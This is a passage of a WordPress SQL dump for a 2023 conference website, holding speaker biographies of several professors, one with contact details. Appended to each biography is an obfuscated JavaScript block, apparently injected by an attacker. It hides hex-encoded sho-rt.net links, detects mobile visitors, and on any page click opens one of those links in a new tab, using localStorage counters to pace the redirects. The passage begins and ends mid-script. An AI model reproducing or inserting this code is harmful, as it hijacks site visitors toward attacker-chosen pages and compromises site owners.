Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Prof. Sherin M. Youssef','','publish','closed','closed','','prof-sherin-m-youssef','','','2023-04-19 22:28:19','2023-04-19 22:28:19','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=4071',0,'dt_team','',0),
(4072,1,'2023-04-19 22:27:23','2023-04-19 22:27:23','','dr sherin','','inherit','open','closed','','dr-sherin','','','2023-04-19 22:27:23','2023-04-19 22:27:23','',4071,'https://gsw2023.com/wp-content/uploads/2023/04/dr-sherin.png',0,'attachment','image/png',0),
(4073,1,'2023-04-19 22:39:38','2023-04-19 22:39:38','<!-- wp:cover {\"overlayColor\":\"white\",\"isDark\":false} -->\n<div class=\"wp-block-cover is-light\"><span aria-hidden=\"true\" class=\"wp-block-cover__background has-white-background-color has-background-dim-100 has-background-dim\"></span><div class=\"wp-block-cover__inner-container\"><!-- wp:paragraph -->\n<p>Professor</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Department of Electrical Engineering</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>American University of Sharjah</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><a href=\"mailto:mshassan@aus.edu\">mshassan@aus.edu</a></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>+971(6)515-2977</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Mohamed S. Hassan received his M.Sc. in Electrical Engineering from the University of Pennsylvania, Philadelphia, in 2000 and his Ph.D. in Electrical and Computer engineering from the University of Arizona, USA, in 2005. He is currently a Full Professor of electrical engineering at the American University of Sharjah. He has published more than 130 journal articles and peer-reviewed conference papers. His research interests include multimedia communications and networking, wireless communications, cognitive radios, resource allocation and performance evaluation of wired networks and next generation wireless systems. He is the general co-chair of ICCSPA’24 and served as the general co-chair of ICCSPA’19 and ICCSPA’22 and TPC chair of ICCSPA’13, ICCSPA’15, ICCSPA’20 and ICMSAO’23.</p>\n<!-- /wp:paragraph --></div></div>\n<!-- /wp:cover -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Mohamed Hassan, PhD','','publish','closed','closed','','mohamed-hassan-phd','','','2023-04-19 22:39:41','2023-04-19 22:39:41','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=4073',0,'dt_team','',0),
(4074,1,'2023-04-19 22:39:16','2023-04-19 22:39:16','','dr mohamed hassan','','inherit','open','closed','','dr-mohamed-hassan','','','2023-04-19 22:39:16','2023-04-19 22:39:16','',4073,'https://gsw2023.com/wp-content/uploads/2023/04/dr-mohamed-hassan.png',0,'attachment','image/png',0),
(4075,1,'2023-04-19 22:44:48','2023-04-19 22:44:48','<!-- wp:cover {\"overlayColor\":\"white\",\"isDark\":false} -->\n<div class=\"wp-block-cover is-light\"><span aria-hidden=\"true\" class=\"wp-block-cover__background has-white-background-color has-background-dim-100 has-background-dim\"></span><div class=\"wp-block-cover__inner-container\"><!-- wp:paragraph -->\n<p><strong><u>Biography of Prof. Hamdy Youssef</u></strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Prof. Hamdy Youssef is a mathematician who specialized in Applied Mathematics. Youssef obtains his D. Sc. degree in mathematics from Alexandria University, 2022 and his Ph. D. degree from Alexandria University, Egypt in 2003. Youssef got a full professor in 2012. Youssef was awarded as a candidate for inclusion in the 2006-2007(9th) Edition of Who’s who in Science and Engineering. Awarded 2000 Outstanding Intellectuals of the 21st Century-2006- Cambridge University. Awarded 21st Century Award for Achievement in Science and Engineering, Cambridge University, 2006. The best paper ICAMSC 2019: International Conference on Applied Mathematics and Scientific Computing, Rome, Italy, 2019; &nbsp;The Best Paper Award, International Research Awards on Science, Health and Engineering, Science Father-SF, SHEN 2021 Awards, 2021; The Best Researcher Award, International Research Awards on Science, Health and Engineering, Science Father-SF, SHEN 2022 Awards, 2022.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Youssef is membership in the American Nano Society (1393562), American Mathematical Society (YSHMMA), European Mechanics Society (EM 120046) and the Editor-in-Chief Journal of Engineering and Thermal Sciences, JVE.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Yousef has more than 160 published papers in international journals and more than 30 papers in international conferences. Youssef published his papers on many different topics such as thermoelasticity, nano- mechanics, biomathematics, information sciences, and modelling of spreading COVID-19. Youssef was the principal investigator of many scientific projects and worked as a consultant at Umm Al-Qura University, KSA. Youssef published international textbook: &nbsp;Wave Propagation in the Two-Temperature Theory of Thermoelasticity, Encyclopedia of Thermal Stresses, pp. 6492-6495, 2014; &nbsp;Prime Archives in Applied Mathematics: 2nd Edition, https://videleaf.com/product/prime-archives-in-applied-mathematics-2nd-edition/,2021; Analyze the Bio-Thermal Behavior of the Human Eye Based on the Heat Conduction Law with One Relaxation Time: New Approaches in Engineering Research Vol. 12, Chapter 10 Print ISBN: 978-93-91882-21-1, eBook ISBN: 978-93-91882-06-8; <a href=\"https://stm.bookpi.org/NPER-V3/article/view/4761\">Influence of the Photothermal Interaction under Lord-Shulman Model on a Viscothermoelastic Semiconducting Solid Cylinder Due to Rotational Movement</a>, Novel Perspectives of Engineering Research Vol. 3,&nbsp;4 November 2021.</p>\n<!-- /wp:paragraph --></div></div>\n<!-- /wp:cover -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const 